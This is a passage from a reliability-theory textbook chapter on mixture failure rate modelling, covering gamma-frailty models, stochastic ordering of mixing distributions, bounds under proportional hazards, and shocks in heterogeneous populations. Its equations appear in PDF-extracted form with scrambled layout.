6.1, is decreasing and converging to 0 as t → ∞ . The corresponding survival function for the multiplicative model (6.16) is exp{− zΛ(t )} . Therefore, the mixture survival function for this specific case, in accordance with Equation (6.4), is ∞ Fm (t ) = ∫ exp{− zΛ(t )}π ( z )dz = π * (Λ (t )) . 0 (6.26) Mixture Failure Rate Modelling 147 As previously, it is written in terms of the Laplace transform of the mixing distribution, but this time as a function of the cumulative baseline failure rate Λ (t ) . The mixture failure rate is given by λm (t ) = − Fm′ (t ) d = − log π * (Λ(t )) . Fm (t ) dt (6.27) It follows from Equations (6.17) and (6.27) that d π * (Λ (t )) dΛ (t ) E[ Z | t ] = − π * (Λ (t )) d =− log π * (Λ(t )) . dΛ (t ) (6.28) The general solution to the inverse problem in terms of the Laplace transform is also simple in this case. From (6.27): π * (Λ (t )) = exp{−Λ m (t )} , where Λ m (t ) , similar to (6.22), denotes the cumulative mixture failure rate. Applying the inverse Laplace transform L−1 (⋅) to both sides of this equation results in λ (t ) = Λ′(t ) = d −1 L (exp{−Λ m (t )}) . dt (6.29) Specifically, for the exponential family of mixing densities (6.20) and for the multiplicative model under consideration, the mixture failure rate is obtained from Equations (6.21) and (6.27) as λm (t ) = − d η (θ + Λ (t )) log dt η (θ ) d η (θ + Λ(t )) d (θ + Λ (t )) = −λ (t ) , η (θ + Λ(t )) and, therefore, the conditional expectation is defined as d η (θ + Λ (t )) d (θ + Λ(t )) E[ Z | t ] = − . η (θ + Λ(t )) (6.30) 148 Failure Rate Modelling for Reliability and Risk Using Equation (6.30), the solution to the inverse problem (6.29) can be obtained in this case as the derivative of the following function: Λ (t ) = η −1 (exp{−λm (t )}η (θ )) − θ . (6.31) Example 6.4 Consider the special case defined by the gamma mixing distribution. This example is meaningful for the rest of this chapter and for the following chapter. We will derive an important relationship for the mixture failure rate, which is wellknown in the statistical and demographic literature. Thus, the mixing pdf π (z ) is defined as π ( z) = β α z α −1 exp{− βz}, α , β > 0 . Γ(α ) (6.32) In accordance with the definitions of the exponential family (6.20) and its Laplace transform (6.21), η (β ) = Γ(α ) β α , π * (t ) = βα ( β + t )α . Therefore, from Equation (6.30): λm (t ) = αλ (t ) β + Λ (t ) (6.33) and E[ Z | t ] = α β + Λ (t ) . Finally, differentiating Equation (6.31), the solution of the inverse problem is obtained as λ (t ) = β ⎧ Λ (t ) ⎫ λ (t ) exp⎨ m ⎬ . α m ⎩ α ⎭ (6.34) Assume that the mixture failure rate is constant, i.e., λm (t ) = c . It follows from (6.34) that for obtaining a constant λm (t ) the baseline λ (t ) should be exponentially increasing, i.e., λ (t ) = β ⎧ ct ) ⎫ c exp⎨ ⎬ . α ⎩α ⎭ This result is really striking: we are mixing the exponentially increasing family of failure rates and arriving at a constant mixture failure rate. Equation (6.33) was first obtained by Beard (1959) and then independently derived by Vaupel et al. (1979) in the demographic context. In the latter paper the Mixture Failure Rate Modelling 149 term ‘frailty’ was also first used for the mixing variable Z . Therefore, this model is usually called “the gamma-frailty model” in the literature. Owing to relatively simple computations, the gamma-frailty model is widely used in various applications. Example 6.5 Let the mixing distribution follow the inverse Gaussian law. We will write the pdf of this distribution in the traditional parameterization as in Hougaard (2000) (compare with the pdf in Section 2.3.8), i.e., π ( z ) = (2π )1/ 2 z −3 / 2ν 1/ 2 exp{ θν } exp{−θ z / 2 − ν / 2 z} . In accordance with Equation (6.20), the corresponding functions μ (z ) and η (θ ) for the exponential family are μ ( z ) = (2π )1/ 2 z −3 / 2ν 1/ 2 exp{−ν / 2 z}, η (θ ) = exp{ θν } . Therefore, similar to the previous example, λm (t ) = ν λ (t ) ν , E[ Z | t ] = . 2 θ + Λ (t ) 2 θ + Λ(t ) Finally, the solution to the inverse problem is given by λ (t ) = 2 ν λm (t )( θν + Λ m (t )) . The inverse problem for some other families of mixing densities can also be considered (Esaulova, 2006). For example, the positive stable distribution (Hougaard, 2000) has a Laplace transform that is convenient for computations (see Equation (6.68) of Example 6.8). On the other hand, the three-parameter power variance function (PVF) includes exponential family and positive stable distributions as specific cases (Hougaard, 2000). 6.5 Mixture Failure Rate Ordering 6.5.1 Comparison with Unconditional Characteristic The ‘unconditional mixture failure rate’ was defined in Inequality (6.3) for the special case of the multiplicative model. Denote this characteristic by λP (t ) . A generalization of Inequality (6.3) (to be formally proved by Theorem 6.2) can be formulated as b λm (t ) < λP (t ) ≡ ∫ λ (t , z )π ( z )dz , a t > 0 ; λm (0) = λP (t ) . (6.35) 150 Failure Rate Modelling for Reliability and Risk Thus, owing to conditioning on the event that an item had survived in [0, t ] , i.e., T > t , the mixture failure rate is smaller than the unconditional one for each t > 0 . Inequality (6.35) can be interpreted as: “the weakest populations are dying out first”. This interpretation is widely used in various special cases, e.g., in the demographic literature. This means that as time increases, those subpopulations that have larger failure rates have higher chances of dying, and therefore the proportion of subpopulations with a smaller failure rate increases. This results in Inequality (6.35) and in a stronger property in the forthcoming Theorem 6.2. Inequality (6.35) is written in terms of failure rate ordering. The usual stochastic order for two random variables X and Y was defined by Definition 3.4. The failure (hazard) rate order is defined in the following way. Definition 6.1. A random variable X with a failure rate λ X (t ) is said to be larger in terms of failure (hazard) rate ordering than a random variable Y with a failure rate FX (t ) if λ X (t ) ≤ λY (t ), t ≥ 0 . (6.36) The conventional notation is X ≥ hr Y . It easily follows from exponential representation (2.5) that failure rate ordering is a stronger ordering, and therefore it implies the usual stochastic ordering (3.40). The function λP (t ) in (6.35) is a supplementary one and it ‘captures’ the monotonicity pattern of the family λ (t , z ) . Therefore, λP (t ) under certain conditions has a similar shape to individual λ (t , z ) . If, e.g., λ (t , z ), z ∈ [a, b] is increasing in t , then λP (t ) is increasing as well. By contrast, as was already discussed in this chapter, the mixture failure rate λm (t ) can have a different pattern: it can ultimately decrease, for instance, or preserve the property that it is increasing in t as in Lynch (1999). There is even a possibility of a number of oscillations (Block et al., 2003). However, despite all possible patterns, Inequality (6.35) holds, and under some additional assumptions, the following difference can monotonically increase in time: (λP (t ) − λm (t )) ↑, t ≥ 0 . (6.37) Definition 6.2. (Finkelstein and Esaulova, 2006b). Inequality (6.35) defines a weak ‘bending-down property’ for the mixture failure rate, whereas (6.37) defines a strong ‘bending-down property’. The main additional assumption that will be needed for the following theorem is that the family of failure rates λ (t , z ), z ∈ [a, b] is ordered in z . Theorem 6.2. Let the failure rate λ (t , z ) in the mixing model (6.4) and (6.5) be differentiable with respect to both arguments and be ordered as λ (t , z1 ) < λ (t , z 2 ), z1 < z 2 , ∀z1 , z 2 ∈ [a, b], t ≥ 0 . (6.38) Mixture Failure Rate Modelling 151 Then • The mixture failure rate λm (t ) bends down with time at least in a weak sense, defined by (6.35); If, additionally, ∂λ (t , z ) / ∂z is increasing in t , then λm (t ) bends down with time in a strong sense, defined by (6.37). Proof. Ordering (6.38) is equivalent to the condition that λ (t , z ) is increasing in z for each t ≥ 0 . In accordance with Equation (6.5), the definition of λP (t ) in (6.35) and integrating by parts: b Δλ (t ) ≡ ∫ λ (t , z )[π ( z ) − π ( z | t )]dz a b = λ (t , z )[Π ( z ) − Π ( z | t )] |ba − ∫ λ z′ (t , z )[Π ( z ) − Π ( z | t )]dz a b = ∫ − λ z′ (t , z ) [Π ( z ) − Π ( z | t )]dz > 0, t > 0 , (6.39) a where Π ( z ) = Pr[ Z ≤ z ], Π ( z | t ) = Pr[ Z ≤ z | T > t ] are the corresponding conditional and unconditional distributions, respectively. Inequality (6.39) and the first part of the theorem follow from λ z′ (t , z ) > 0 and from the following inequality: Π ( z ) − Π ( z | t ) < 0, t > 0, z ∈ [a, b] . (6.40) To obtain (6.40), it is sufficient to prove that z Π( z | t ) = ∫ F (t, u)π (u)du a b ∫ F (t, u)π (u)du a is increasing in t . It is easy to see that the derivative of this function is positive if z ∫ Ft ′(t, u)π (u)du a z b ∫ F ′(t, u )π (u )du t > a b ∫ F (t, u )π (u )du ∫ F (t, u)π (u)du a a . 152 Failure Rate Modelling for Reliability and Risk As Ft′(t , z ) = −λ (t , z ) F (t , z ) , it is sufficient to show that (Finkelstein and Esaulova, 2006b) z z a a λ (t , z ) ∫ F (t , u )π (u )du > ∫ λ (t , u ) F (t , u )π (u )du , which follows from (6.38). Therefore, as the functions ∂λ (t , z ) / ∂z and Π ( z | t ) are increasing in t , the final integrand in (6.39) is also increasing in t . Thus, the difference Δλ (t ) is also increasing, which immediately leads to the strong bendingdown property (6.37). It is worth noting that the decreasing of Π[ Z | t ] in t can also be interpreted via “the weakest populations are dying out first” principle, as this distribution tends to be more concentrated around small values of Z ≥ a as time increases. The light bulb example of Section 6.1 (Figure 6.1) shows the strong bendingdown property for the mixture failure rate in practice. It was conducted by the author at the Max Planck Institute for Demographic Research (Finkelstein, 2005c). We recorded the failure times for a population of 750 miniature lamps and constructed the empirical failure rate function (in relative units) for the time interval 250 h. The results were convincing: the failure rate initially increased (a tentative fit showed the Weibull law) and then decreased to a very low level. The pattern of the observed failure rate is similar to that in Figure 3.1. 6.5.2 Likelihood Ordering of Mixing Distributions We will show now that a natural ordering for our mixing model is the likelihood ratio ordering. For brevity, the terms “smaller” or “decreasing” are used and the evident symmetrical “larger” or “increasing” are omitted or vice versa. A similar reasoning can be found in Block et al. (1993) and Shaked and Spizzichino (2001). Let Z1 and Z 2 be continuous non-negative random variables with the same support and densities π 1 ( z ) and π 2 ( z ) , respectively. Definition 6.3. Z 2 is smaller than Z1 in the sense of the likelihood ratio ordering: Z1 ≥ lr Z 2 (6.41) if π 2 ( z ) / π 1 ( z ) is a decreasing function (Ross, 1996). Definition 6.4. Let Z (t ), t ∈ [0, ∞) be a family of random variables indexed by a parameter t (e.g., time) with probability density functions p ( z , t ) . We say that Z (t ) is decreasing in t in the sense of the likelihood ratio (the decreasing likelihood ratio (DLR) class) if L( z , t1 , t2 ) = is decreasing in z for all t2 > t1 . p( z , t2 ) p ( z , t1 ) Mixture Failure Rate Modelling 153 This property can also be formulated in terms of log-convexity of Glazer’s function defined by Equation (2.36), as in Navarro (2008). It can be proved (Ross, 1996) that the likelihood ratio ordering implies the failure rate ordering. Therefore, it is the strongest of the three types of ordering considered so far. Thus, in accordance with Equations (3.40), (6.36) and (6.41), we have Z1 ≥ lr Z 2 ⇒ Z1 ≥ hr Z 2 ⇒ Z1 ≥ st Z 2 . (6.42) The following simple result states that the family of conditional mixing random variables Z | t , t ∈ [0, ∞] forms the DLR class. Theorem 6.3. Let the family of failure rates λ (t , z ) in mixing model (6.5) be ordered as in (6.38). Then the family of random variables Z | t ≡ Z | T > t is DLR in t ∈ [0, ∞) . Proof. In accordance with the definition of the conditional mixing distribution (3.10) in the mixing model (6.5), the ratio of the densities for different instants of time is b L( z , t1 , t 2 ) = π ( z | t2 ) = π ( z | t1 ) F (t 2 , z ) ∫ F (t1 , z )π ( z )dz a b . (6.43) F (t1 , z ) ∫ F (t 2 , z )π ( z )dz a Therefore, monotonicity in z of L( z , t1 , t2 ) is defined by the function ⎫⎪ ⎧⎪ t F (t 2 , z ) = exp⎨− ∫ λ (u , z )du ⎬ , F (t1 , z ) ⎪⎭ ⎩⎪ t 2 1 which, owing to Ordering (6.38), is decreasing in z for all t2 > t1 . Consider now two different mixing random variables Z1 and Z 2 with probability density functions π 1 ( z ) , π 2 ( z ) and the corresponding cumulative distribution functions Π1 ( z ), Π 2 ( z ) , respectively. Intuition suggests that if Z1 is larger than Z 2 in some stochastic sense to be defined, then the corresponding mixture failure rates should be ordered accordingly: λm1 (t ) ≥ λm 2 (t ) . The question is what type of ordering will guarantee this inequality? Simple examples show (Esaulova, 2006) that usual stochastic ordering is too weak for this purpose. It was stated already that the likelihood ratio ordering is a natural one for the family of random variables Z | t in our mixing model. Therefore, it seems reasonable to order Z1 and Z 2 in this sense, and see whether this ordering will lead to the desired ordering of the corresponding mixture failure rates or not. 154 Failure Rate Modelling for Reliability and Risk The following lemma states that the likelihood ratio ordering is stronger than the usual stochastic ordering (3.40). This well-known fact is already indicated by Relationship (6.42), but we need a new proof to be used later. Lemma 6.4. Let π 2 ( z) = g ( z )π 1 ( z ) b , (6.44) ∫ g ( z )π ( z )dz 1 a where g (z ) is a continuous, decreasing function and the integral is a normalizing constant (integration of π 1 ( z ) should result in 1 ). Then Z1 is stochastically larger than Z 2 . Proof. Indeed, z Π 2 ( z) = ∫ g (u )π1 (u)du a b ∫ g (u )π1 (u)du a z ∫ g (u)π (u)du 1 = a z b a z ∫ g (u)π1 (u )du + ∫ g (u)π1 (u )du z = g * (a, z ) ∫ π 1 (u )du z a z b g * (a, z ) ∫ π 1 (u )du + g * ( z , b) ∫ π 1 (u )du a ≥ ∫ π 1 (u )du = Π1 ( z ) , (6.45) a z where g * (a, z ) and g * ( z , b) are the mean values of the function g ( z ) for the corresponding integrals. As this function decreases, g * ( z , b) ≤ g * (a, z ) and the inequality in (6.45) follows. Now we are able to prove the main ordering theorem (Finkelstein and Esaulova, 2006), showing that under certain assumptions the mixture failure rates for different mixing distributions are ordered in the sense of the failure rate ordering (6.36). A similar result is stated by Theorem 1.C.17 in Shaked and Shanthikumar (2007). Using general results on the totally positive functions (Karlin, 1968), these authors under more stringent conditions prove that the corresponding mixture random variables are ordered in a stronger sense of the likelihood ratio ordering. Our approach, by contrast, is based on direct reasoning and can also be used for ‘deriving’ the likelihood ratio ordering of mixing distributions as the necessary condition for the corresponding failure (hazard) rate ordering (see Equation 6.49). Theorem 6.4. Let Equation (6.44) hold, where g (z ) is a decreasing function, which means that Z1 is larger than Z 2 in the sense of the likelihood ratio ordering. Assume also that Ordering (6.38) holds. Then the following inequality holds for ∀t ∈ [0, ∞) : Mixture Failure Rate Modelling b b λm1 (t ) ≡ 155 ∫ f (t, z)π f (t , z )π 1 ( z )dz ≥ a b 2 ( z )dz ≡ λm 2 (t ) . a b ∫ F (t , z )π ( z)dz ∫ F (t , z )π 1 2 (6.46) ( z )dz a a Proof. Inequality (6.46) means that the mixture failure rate, which is obtained for a stochastically larger mixing distribution (in the likelihood ratio ordering sense), is larger for ∀t ∈ [0, ∞) than the one obtained for the stochastically smaller mixing distribution. Therefore, the corresponding (mixture) random variables are ordered in the sense of the failure (hazard) rate ordering. We shall prove, first, that z Π1 ( z | t ) = ∫ F (t , u)π1 (u )du a b z ∫ F (t , u )π ∫ F (t , u)π (u )du ∫ F (t , u )π 1 a 2 (u )du ≡ Π2 (z | t) . a b 2 (6.47) (u )du a Indeed, using Equation (6.44): g (u )π 1 (u ) z ∫ F (t, u) z F (t , u )π 2 (u )du a = a b ∫ F (t , u)π a 2 (u )du b du g (u )π 1 (u )du a g (u )π 1 (u ) b ∫ F (t, u) a b du ∫ g (u)π (u)du 1 a z = z g (u ) F (t , u )π 1 (u )du g (u ) F (t , u )π 1 (u )du a ∫ F (t, u )π (u)du 1 a b a b , F (t , u )π 1 (u )du a where the last inequality follows using exactly the same argument as in Inequality (6.45) of Lemma 6.4. Performing integration by parts as in (6.39) and taking into account Inequality (6.47) results in b λm1 (t ) − λm 2 (t ) = ∫ λ (t , z )[π 1 ( z | t ) − π 2 ( z | t )]dz a b = ∫ − λz′ (t , z )[Π1 ( z | t ) − Π 2 ( z | t )]dz ≥ 0, t > 0 . a (6.48) 156 Failure Rate Modelling for Reliability and Risk Thus, when the mixing distributions are ordered in the sense of the likelihood ordering, the mixture failure rates are ordered as λm1 (t ) ≥ λm 2 (t ) . A starting point for Theorem 6.4 is Equation (6.44) with the crucial assumption of a decreasing function g ( z ) defining, in fact, the likelihood ratio ordering. This was our reasonable guess, as the usual stochastic order was not sufficient for the desired mixture failure rate ordering and a stronger ordering had to be considered. But this guess can be justified directly by considering the difference Δλ (t ) = λm1 (t ) − λm 2 (t ) and using Equations (6.5) and (3.10). The corresponding numerator (the denominator is positive) is transformed into a double integral in the following way: b b a a ∫ λ (t , z ) F (t , z )π 1 ( z )dz ∫ F (t , z )π 2 ( z )dz b b − λ (t , z ) F (t , z )π 2 ( z )dz F (t , z )π 1 ( z )dz a a b b = ∫ ∫ F (t , u)F (t, s)[λ (t , u)π (u)π 1 2 ( s ) − λ (t , s )π 1 (u )π 2 ( s )]duds a a b b = ∫ ∫ F (t , u ) F (t , s)(λ (t, u) − λ (t, s))(π (u)π 1 2 ( s ) − π 1 ( s )π 2 (u ))duds . (6.49) a a u >s Therefore, the final double integral is positive if Ordering (6.38) in the family of failure rates holds and π 2 ( z ) / π 1 ( z ) is decreasing. Thus, the likelihood ratio ordering is derived as a necessary condition for the corresponding ordering of mixture failure rates. What happens when Z1 and Z 2 are ordered only in the sense of usual stochastic ordering: Z1 ≥ st Z 2 ? As was already mentioned, this ordering is not sufficient for the mixture failure rate ordering (6.46). However, it is sufficient for the ordinary stochastic order of the corresponding random variables (Shaked and Shanthikumar, 2007). Indeed, similar to (6.48), it can be seen integrating by parts and taking into account that Fz′(t , z ) > 0 and that Π1 ( z ) − Π 2 ( z ) ≤ 0 : b Fm1 (t ) − Fm 2 (t ) = ∫ F (t , z )[π 1 ( z ) − π 2 ( z )]dz a b = ∫ − Fz′(t , z ) [Π1 ( z ) − Π 2 ( z )]dz ≥ 0, t > 0 . a Denote the corresponding mixture random variables by Y1 and Y2 , respectively. Thus, the assumed ordering Z1 ≥ st Z 2 results in the following stochastic ordering for Y1 and Y2 : Y1 ≤ st Y2 , Mixture Failure Rate Modelling 157 which is evidently weaker than Inequality (6.46). Note that the latter inequality can equivalently be written as Y1 ≤ hr Y2 . 6.5.3 Mixing Distributions with Different Variances If mixing variables are ordered in the sense of the likelihood ratio ordering, then automatically E[ Z1 ] ≥ E[ Z 2 ] , (6.50) which obviously holds for the weaker (usual) stochastic ordering (3.40) as well. Inequality (6.50), in fact, can be considered as a definition of a very weak ordering of random variables Z1 and Z 2 . Let Π1 ( z ) and Π 2 ( z ) now be two mixing distributions with equal means. It follows from Equation (6.17) that for the multiplicative model, which will be considered in this section, the initial values of the mixture failure rates are equal in this case: λm1 (0) = λm 2 (0) . Intuitive considerations and general reasoning based on the principle “the weakest populations are dying out first” suggest that, unlike (6.46), the mixture failure rates will be ordered as λm1 (t ) < λm 2 (t ), t > 0 (6.51) if the variance of Z1 is larger than the variance of Z 2 . It will be shown, however, that this is true only for a special case and that for the general multiplicative model this ordering holds only for a sufficiently small time t . Example 6.6 For a meaningful example, consider a multiplicative frailty model (6.17), where Z has a gamma distribution: π ( z) = β α z α −1 exp{− β z}, λ , β > 0 . Γ(α ) Substituting this density into (3.8) and taking into account the multiplicative form of the failure rate, ∞ λm (t ) = λ (t ) ∫ exp{− zΛ (t )}zπ ( z )dz 0 , ∫ exp{− zΛ(t )}π ( z )dz 0 where Λ (t ) , as previously, denotes a cumulative baseline failure rate. 158 Failure Rate Modelling for Reliability and Risk It follows from Example 6.4 that the mixture failure rate in this case is λm (t ) = αλ (t ) . β + Λ (t ) As E[ Z ] = α / β and Var ( Z ) = α / β 2 , this equation can now be written in terms of E[Z ] and Var (Z ) in the following way: λm (t ) = λ (t ) E 2[Z ] , E[ Z ] + Var ( Z )Λ(t ) (6.52) which, for the specific case E[ Z ] = 1 , gives the result of Vaupel et al. (1979) that is widely used in demography: λm (t ) = λ (t ) 1 + Var ( Z )Λ (t ) . (6.53) Using Equation (6.52), we can compare mixture failure rates of two populations with different Z1 and Z 2 on condition that E[ Z 2 ] = E[ Z1 ] . Therefore, the comparison is straightforward, i.e., Var ( Z1 ) ≥ Var ( Z 2 ) ⇒ λm1 (t ) ≤ λm 2 (t ) . (6.54) Intuitively it can be expected that this result could be valid for arbitrary mixing distributions, at least for the multiplicative model. However, the mixture failure rate dynamics in time can be much more complicated even for this special case. The following theorem shows that ordering of variances is a sufficient and necessary condition for ordering of mixture failure rates, but only for the initial time interval. Theorem 6.5. Let Z1 and Z 2 be two mixing distributions with equal means in the multiplicative model (6.16) and (6.17). Then ordering of variances Var ( Z1 ) > Var ( Z 2 ) (6.55) is a sufficient and necessary condition for ordering of mixture failure rates in the neighbourhood of t = 0 , i.e., λm1 (t ) < λm 2 (t ); t ∈ (0, ε ), (6.56) where ε > 0 is sufficiently small. Proof. Sufficient condition: From Equation (6.17) we have Δλ (t ) = λm1 (t ) − λm 2 (t ) = λ (t )( E[ Z1 | t ] − E[ Z 2 | t ) . (6.57) Mixture Failure Rate Modelling 159 Equation (6.19) reads: E ′[ Z i | t ] = −λ (t )Var ( Z i | t ) < 0, i = 1,2, t ≥ 0 , (6.58) E[ Z i | 0] ≡ E[ Z i ], (6.59) where Var ( Z i | 0) ≡ Var ( Z i ) . Thus, if Ordering (6.55) holds, Ordering (6.56) follows immediately after showing that the derivative of the function λm1 (t ) E[ Z1 | t ] = λm 2 (t ) E[ Z 2 | t ] at t = 0 is negative. This follows from Equation (6.58). Finally, the equation λm1 (0) = λm 2 (0) for the case of equal means is also taken into account. Necessary condition: The corresponding proof is rather technical (see Finkelstein and Esaulova, 2006 for details) and is based on considering the numerator of the difference Δλ (t ) , which is b b λ (t ) ∫ ∫ [exp{−Λ (t )(u + s)}](u − s)π 1 (u )π 2 ( s)duds . a a 6.6 Bounds for the Mixture Failure Rate In this section, we are mostly interested in simple bounds for the mixture failure rate for the multiplicative model of mixing. The obtained bounds can be helpful in various applications, e.g., for mortality rate analysis in heterogeneous populations. We show that when the failure rates of subpopulations follow the proportional hazards (PH) model with the multiplicative frailty Z and the common proportionality factor k , the resulting mixture failure rate has a strict upper bound kλm (t ) , where λm (t ) has a meaning of the mixture failure rate in a heterogeneous population without a proportionality factor ( k ≡ 1 ). Furthermore, this result presents another explicit justification of the fact that the PH model in each realization does not result in the PH model for the corresponding mixture failure rates. It is well known that the PH model is a useful tool, e.g., for modelling the impact of environment on lifetime random variables. It is widely used in survival analysis. Combine the multiplicative model (6.16) with the PH model in the following way: λ (t , z, k ) = zkλ (t ) ≡ zk λ (t ) , (6.60) where z , as previously, comes from the realization of an unobserved random frailty Z and k is a proportional factor from the ‘conventional’ PH model. For the 160 Failure Rate Modelling for Reliability and Risk sake of modelling, this factor is written in an ‘aggregated’ form and not via a vector of explanatory variables, as is usually done in statistical inference. Therefore, the baseline F (t ) is indexed by the random variable Z k = kZ . Equivalently, Equation (6.60) can be interpreted as a frailty model with a mixing random variable Z and a baseline failure rate kλ (t ) . These two simple equivalent interpretations will help us in what follows. Without losing generality, assume that the support for Z is [0, ∞) . Similar to (6.17), the mixture failure rate λmk (t ) for the described case is defined as ∞ λmk (t ) = kλ (t ) ∫ zπ k ( z | t )dz ≡ λ (t ) E[ Z k | t ] . (6.61) 0 As Z k = kZ , its pdf is pk ( z ) = 1 ⎛z⎞ π⎜ ⎟. k ⎝k⎠ Theorem 6.6. Let the mixture failure rates for the multiplicative models (6.16) and (6.60) be given by Equations (6.17) and (6.61) respectively and let k > 1 . Assume that the following quotient increases in z : ⎛z⎞ Then: π⎜ ⎟ π k ( z) k = ⎝ ⎠ ↑. π ( z ) kπ ( z ) (6.62) λmk (t ) > λm (t ), ∀t ∈ [0, ∞) . (6.63) Proof. Although Inequality (6.63) seems trivial at first sight, it is valid only for some specific cases of mixing (e.g., for the multiplicative model, which is considered now). Denote Δλm (t ) = λmk (t ) − λm (t ) . (6.64) Similar to (6.49) and using Equation (6.5), it can be seen that the sign of this difference is defined by the sign of the following difference: ∞ 0 0 0 ∫ zF (t, z)π k ( z)dz ∫ F (t , z )π ( z)dz −∫ zF (t , z )π k ( z)dz ∫ F (t , z)π ( z)dz 0 ∞∞ = ∫ ∫ F (t , u )F (t , s )[uπ k (u )π ( s ) − sπ k (u )π ( s )]duds 0 0 ∞ ∞ = ∫ ∫ F (t , u) F (t, s)(u − s)(π 0 0 u >s k (u )π ( s ) − π k ( s )π (u ))duds . (6.65) Mixture Failure Rate Modelling 161 Therefore, the sufficient condition for Inequality (6.63) is Relationship (6.62). It is easy to verify that this condition is satisfied, e.g., for the gamma and the Weibull densities, which are often used for mixing. In fact, while deriving Equation (6.65), the multiplicative form of the model was not used. Thus, Theorem 6.6 is valid for the general mixing model (6.5), although the proportionality Z k = kZ has a clear meaning only for the multiplicative model. Example 6.7 Consider the multiplicative gamma-frailty model of Example 6.6. The mixture failure rate λm (t ) in this case is given by Equation (6.52). The mixture failure rate λmk (t ) is λmk (t ) = λ (t ) E 2 [Z k ] . E[ Z k ] + Var ( Z k )Λ (t ) (6.66) Let k > 1 . Then λmk (t ) = λ (t ) k 2 E 2 [Z ] > λm (t ), kE[ Z ] + k 2Var ( Z )Λ (t ) which is a direct proof of Inequality (6.63) in this special case. The upper bound for λmk (t ) is given by the following theorem. Theorem 6.7. Let the mixture failure rates for multiplicative models (6.16) and (6.60) be given by Equations (6.17) and (6.61) respectively and let k > 1 . Then λmk (t ) < kλm (t ), t > 0 . (6.67) Proof. As Z k = kZ , it is clear that λmk (0) = kλm (0) . Consider the difference in (6.64) in a slightly different way than in the previous theorem. The mixture failure rate λmk (t ) will be defined equivalently by the baseline failure rate kλ (t ) and the mixing variable Z . This means that λmk (t ) − kλm (t ) = kλ (t )( Eˆ [ Z | t ] − E[ Z | t ]) , where conditioning in Eˆ [ Z | t ] is different from that in E[ Z | t ] in the described sense. Denote Fk (t , z ) = exp{− zkΛ (t )} . Similar to (6.65), sign[λmk (t ) − kλm (t ) ] is defined by ∞ ∞ sign ∫ ∫ π (u )π ( s )(u − s )( Fk (t , u ) F (t , s ) − F (t , u ) Fk (t , s ))duds , 0 0 u >s which is negative for all t > 0 , as 162 Failure Rate Modelling for Reliability and Risk Fk (t , z ) = exp{−(k − 1) zΛ (t )} F (t , z ) is decreasing in z. It is worth noting that we do not need additional conditions for this bound as in the case of Theorem 6.5. An obvious but meaningful consequence of (6.67) is λmk (t ) ≠ kλm (t ), t > 0 . Therefore, this theorem gives another explicit justification of a well-known fact: The PH model in each realization does not result in the PH model for the corresponding mixture failure rates. Example 6.7 (continued). The gamma-frailty model is a direct illustration of Inequality (6.67), which can be seen in the following way: λmk (t ) = λ (t ) < λ (t ) k 2 E 2[Z ] kE[ Z ] + k 2Var ( Z )Λ (t ) kE 2 [ Z ] = kλm (t ) . E[ Z ] + Var ( Z )Λ(t ) Example 6.8 In this example, we will consider the stable frailty distributions. A distribution is strictly stable (Feller, 1971) if the sum of independent random variables described by this distribution follows the same distribution, i.e., c(n) Z1 = D Z1 + Z 2 + ... + Z n , where = D denotes “the same distributions”. The function c(n) has the form n1/ α , where α is between 0 and 2 . The normal distribution results from α = 2 and the degenerate distribution is defined by α = 1 . It follows from Hougaard (2000) that the Laplace transform of a stable distribution with a positive support is given by ⎧ β sα ⎫ L( s ) = exp⎨− ⎬, ⎩ α ⎭ (6.68) where β is a positive parameter and α ∈ (0,1] for a positive stable distribution. Applying Equation (6.27) to Model (6.16) results in λm (t ) = βλ (t )(Λ (t ))α −1 . (6.69) Mixture Failure Rate Modelling 163 On the other hand, applying Equation (6.27) to (6.60) gives λmk (t ) = k α βλ (t )(Λ (t ))α −1 = k α λm (t ) . (6.70) Therefore, we observe proportionality in this setting but with the changing coefficient of proportionality (from k to k α , respectively). It is clear that this specific result does not contradict Theorems 6.6 and 6.7, as it follows from (6.69) and (6.70) that for positive stable distributions ( α ∈ (0,1) ) and k > 1 , the following inequalities hold: λm (t ) < λmk (t ) < kλm (t ), t > 0 . 6.7 Further Examples and Applications 6.7.1 Shocks in Heterogeneous Populations Consider the general mixing model (6.4) and (6.5) for a heterogeneous population and assume that at time t = t1 an instantaneous shock had occurred that affects the whole population. With the corresponding complementary probabilities it either kills (destroys) an item or ‘leaves it unchanged’. Without losing generality, let t1 = 0 ; otherwise a new initial mixing variable should be defined and the corresponding procedure can easily be adjusted to this case. It is natural to suppose that the frailer (with larger failure rates) the items are, the more susceptible they are to failure. This means that the probability of a failure (death) from a shock is an increasing function of the value of the failure rate of an item at t = 0 . Therefore a shock performs a kind of a burn-in operation (see, e.g., Block et al., 1993; Mi, 1994; Clarotti and Spizzichino, 1999; Cha, 2000, 2006). The initial pdf of a frailty Z before the shock is π (z ) . After a shock the frailty and its distribution change to Z1 and π 1 ( z ) , respectively. As previously, let the mixture failure rate for a population without a shock be λm (t ), t ≥ 0 and denote the corresponding mixture failure rate for the same population after a shock at t = 0 by λms (t ), t ≥ 0 . We want to compare λms (t ) and λm (t ) . It is reasonable to suggest that λms (t ) < λm (t ), as the items with higher failure rates are more likely to be eliminated. As was already mentioned, the natural ordering for mixing distributions is the ordering in the sense of the likelihood ratio defined by Inequality (6.41). In accordance with this definition, assume that Z ≥ lr Z1 , (6.71) which means that π 1 ( z ) / π ( z ) is a decreasing function. Now we are able to formulate the following result, which is proved in a way similar to Theorems 6.6 and 6.7. Theorem 6.8. Let the mixing variables before and after a shock at t = 0 be ordered in accordance with (6.71). Assume that λ (t , z ) is ordered in z , i.e., λ (t , z1 ) < λ (t , z 2 ), z1 < z 2 , ∀z1 , z 2 ∈ [0, ∞], t ≥ 0 . (6.72) 164 Failure Rate Modelling for Reliability and Risk Then λms (t ) < λm (t ), ∀t ≥ 0 . (6.73) Proof. Inequality (6.72) is a natural ordering for the family of failure rates λ (t , z ), z ∈ [0, ∞) and trivially holds, e.g., for the specific multiplicative model. Conducting all steps as when obtaining Equation (6.65) finally results in the following relationship: sign[λms (t ) − λm (t )] b b = sign ∫ ∫ F (t , u) F (t, s)(λ (t, u ) − λ (t , s))(π (u )π (s) − π (s)π (u))duds , 1 1 a a u>s which is negative due to (6.71) and (6.72). In accordance with Inequality (6.73), λms (t ) < λm (t ) for t ≥ 0 . This fact seems intuitively evident, but it is valid only owing to the rather stringent conditions of this theorem. It can be shown, for example, that replacing (6.71) with a weaker condition of usual stochastic ordering Z ≥ st Z1 does not guarantee Ordering (6.73) for all t . 6.7.2 Random Scales and Random Usage Consider a system with a baseline lifetime Cdf F (x) and a baseline failure rate λ (x) . Let this system be used intermittently. A natural model for this pattern is, e.g., an alternating renewal process with periods when the system is ‘on’ 